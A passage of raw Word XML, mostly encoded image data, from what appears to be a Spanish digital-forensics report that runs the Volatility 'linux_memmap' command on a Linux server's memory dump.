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&#10;N12oJYhDFNTTI8gil//5ix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xn/YJUDAAAjCAAADgAAAAAAAAAAAAAAAAA6AgAAZHJzL2Uyb0RvYy54bWxQSwECLQAK&#10;AAAAAAAAACEAuvtJm/bRAAD20QAAFAAAAAAAAAAAAAAAAAD7BQAAZHJzL21lZGlhL2ltYWdlMS5w&#10;bmdQSwECLQAUAAYACAAAACEAe4kTed8AAAAHAQAADwAAAAAAAAAAAAAAAAAj2AAAZHJzL2Rvd25y&#10;ZXYueG1sUEsBAi0AFAAGAAgAAAAhAKomDr68AAAAIQEAABkAAAAAAAAAAAAAAAAAL9kAAGRycy9f&#10;cmVscy9lMm9Eb2MueG1sLnJlbHNQSwUGAAAAAAYABgB8AQAAItoAAAAA&#10;">
                <v:shape id="Imagen 79" o:spid="_x0000_s1106" type="#_x0000_t75" alt="Texto&#10;&#10;Descripción generada automáticamente" style="position:absolute;width:31578;height:17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vgxxwAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvwv6H8Ba8aaoFsdUoiyh4EtYVz4/m2dZtXmoT2+qv3wjCHoeZb4ZZrntTiZYaV1pWMBlHIIgz&#10;q0vOFZx+dqM5COeRNVaWScGDHKxXH4Mlptp2/E3t0ecilLBLUUHhfZ1K6bKCDLqxrYmDd7GNQR9k&#10;k0vdYBfKTSWnUTSTBksOCwXWtCko+z3ejYLE3Tp93tX2cDOn8wMPz+u2fSo1/Oy/FiA89f4//Kb3&#10;OnBJPJvM4ziB16VwB+TqDwAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAA&#10;AAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEA&#10;AAsAAAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAHji+DHHAAAA4gAA&#10;AA8AAAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD7AgAAAAA=&#10;">
                  <v:imagedata r:id="rId154" o:title="Texto&#10;&#10;Descripción generada automáticamente"/>
                </v:shape>
                <v:shape id="_x0000_s1107" type="#_x0000_t202" style="position:absolute;left:33039;top:5434;width:20339;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Ka7zAAAAOIAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/LTsMw&#10;EEX3SPyDNUhsEHVoQx+hblVVRQI2FaEbdqN4GqeNx5HttOHv8QKJ5dV96SzXg23FhXxoHCt4GmUg&#10;iCunG64VHL5eH+cgQkTW2DomBT8UYL26vVliod2VP+lSxlqkEQ4FKjAxdoWUoTJkMYxcR5y8o/MW&#10;Y5K+ltrjNY3bVo6zbCotNpweDHa0NVSdy94q2Offe/PQH3cfm3zi3w/9dnqqS6Xu74bNC4hIQ/wP&#10;/7XftILF/HmWzxbjBJGQEg7I1S8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMA&#10;AAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78A&#10;AAAVAQAACwAAAAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA63Cmu8wA&#10;AADiAAAADwAAAAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAAAD&#10;AAAAAA==&#10;" stroked="f">
                  <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="2C6DC4C9" w14:textId="44B5E082" w:rsidR="006416DF" w:rsidRPr="00445BCB" w:rsidRDefault="006416DF" w:rsidP="006416DF">
                        <w:pPr>
                          <w:pStyle w:val="Descripcin"/>
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve">Ilustración </w:t>
                        </w:r>
                        <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                          <w:r w:rsidR="00117A4E">
                            <w:rPr>
                              <w:noProof/>
                            </w:rPr>
                            <w:t>27</w:t>
                          </w:r>
                        </w:fldSimple>
                        <w:r>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:bookmarkStart w:id="74" w:name="_Toc155782594"/>
                        <w:r>
                          <w:t xml:space="preserve">Comando </w:t>
                        </w:r>
                        <w:r w:rsidRPr="00460B60">
                          <w:t>linux_memmap.</w:t>
                        </w:r>
                        <w:bookmarkEnd w:id="74"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <w10:wrap type="square" anchorx="margin"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD">
        <w:t>Linux_memmap.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0DA8A2" w14:textId="562D58E9" w:rsidR="000E1874" w:rsidRPr="000E1874" w:rsidRDefault="000E1874" w:rsidP="000E1874">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155751606 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Referencia XV.</w:t>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="538135" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="000E1874">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F69A523" w14:textId="2B3DC8FB" w:rsidR="00AA7FAD" w:rsidRPr="00AA7FAD" w:rsidRDefault="00AA7FAD" w:rsidP="00AA7FAD">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Se procede ahora a realizar un mapa de memoria del sistema, para </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>así</w:t>
      </w:r>
      <w:r w:rsidRPr="00AA7FAD">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, entender cómo está organizada la memoria en el servidor. Para ello ejecutaremos el comando </w:t>
      </w:r>
      <w:r w:rsidRPr="00D444D2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>sudo python2.7 vol.py --profile=LinuxlinuxUbuntu_4_15_0-1021-aws_profilex64 -f '/home/jrodg85/Server_RAM</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
